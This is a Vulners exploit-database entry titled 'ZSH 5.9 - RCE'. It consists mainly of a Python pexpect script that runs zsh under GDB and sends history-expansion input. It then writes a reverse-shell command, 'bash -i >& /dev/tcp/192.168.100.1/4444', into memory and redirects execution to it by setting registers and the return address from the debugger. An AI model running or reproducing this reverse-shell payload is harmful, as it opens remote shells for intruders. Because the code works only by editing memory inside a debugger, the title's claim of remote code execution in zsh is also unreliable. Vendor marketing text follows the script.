Vulners
Lucene search
ZSH 5.9 - RCE
# Exploit ZSH 5.9 - RCE
# Date: 30-12-2025
# Exploit Author: sinanadilrana
import pexpect
import sys
import time
def debug_print(msg):
print(f"[DEBUG] {msg}")
def return_to_gdb(gdb, max_attempts=3, timeout=3):
"""More reliable function to return to GDB prompt"""
debug_print("Attempting to return to GDB...")
for attempt in range(max_attempts):
gdb.sendintr() # Send CTRL+C
time.sleep(0.5)
try:
index = gdb.expect([b'pwndbg>', b'\(gdb\)', pexpect.TIMEOUT], timeout=timeout)
if index in [0, 1]: # Found either pwndbg> or (gdb) prompt
debug_print("Successfully returned to GDB")
return True
except pexpect.EOF:
debug_print("Session ended unexpectedly")
return False
debug_print(f"Attempt {attempt + 1} failed, retrying...")
debug_print("Failed to return to GDB after maximum attempts")
return False
# Configure pexpect with consistent bytes mode
gdb = pexpect.spawn('gdb --args zsh -f', timeout=30, encoding=None)
gdb.logfile = sys.stdout.buffer
debug_print("Starting GDB with zsh -f...")
try:
gdb.expect(b'pwndbg>', timeout=10)
debug_print("GDB started successfully")
except (pexpect.EOF, pexpect.TIMEOUT) as e:
debug_print(f"GDB failed to start: {str(e)}")
sys.exit(1)
# Run zsh and handle shell
debug_print("Running zsh...")
gdb.sendline(b'run')
shell_prompts = [b'% ', b'# ', b'\\$ ', b'vuln>', b'vuln% ']
try:
gdb.expect(shell_prompts + [b'pwndbg>'], timeout=10)
debug_print("Shell started successfully")
except pexpect.TIMEOUT:
debug_print("Timeout waiting for shell")
gdb.sendintr()
time.sleep(1)
# Shell command execution
if any(prompt in gdb.after for prompt in shell_prompts):
for cmd in [b'!', b'!!11111111111']:
debug_print(f"Sending: {cmd.decode('utf-8', errors='replace')}")
gdb.sendline(cmd)
try:
gdb.expect(shell_prompts, timeout=3)
debug_print("Command executed")
except pexpect.TIMEOUT:
debug_print("No response from command")
# Use the new return_to_gdb function
if not return_to_gdb(gdb):
debug_print("Critical error - couldn't return to GDB")
sys.exit(1)
# Memory operations - simplified and more reliable
if b'pwndbg>' in gdb.after:
mem_commands = [
b'x/s 0x555555659000',
b'set {char[120]} 0x555555659000 = "bash -c \\"bash -i >& /dev/tcp/192.168.100.1/4444 0>&1\\""',
b'set {long}0x7fffffffd868 = 0x7ffff7cc9110',
b'set $rdi = 0x555555659000',
b'set $rsp = $rsp - 8',
b'continue',
b'set {long}$rsp = 0x55555555a000',
b'set $rip = 0x7ffff7cc9110',
b'set $rdi = 0x555555659000',
b'continue'
]
for cmd in mem_commands:
debug_print(f"Executing: {cmd.decode('utf-8', errors='replace')}")
gdb.sendline(cmd)
try:
if b'continue' in cmd:
gdb.expect([b'pwndbg>'] + shell_prompts, timeout=15)
else:
gdb.expect(b'pwndbg>', timeout=5)
except pexpect.TIMEOUT:
debug_print("Timeout - attempting to recover...")
if not return_to_gdb(gdb):
debug_print("Failed to recover after timeout")
break
# Final interactive mode
debug_print("Complete - entering interactive")
try:
gdb.logfile = None
gdb.interact()
except Exception as e:
debug_print(f"Interactive error: {str(e)}")
finally:
gdb.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9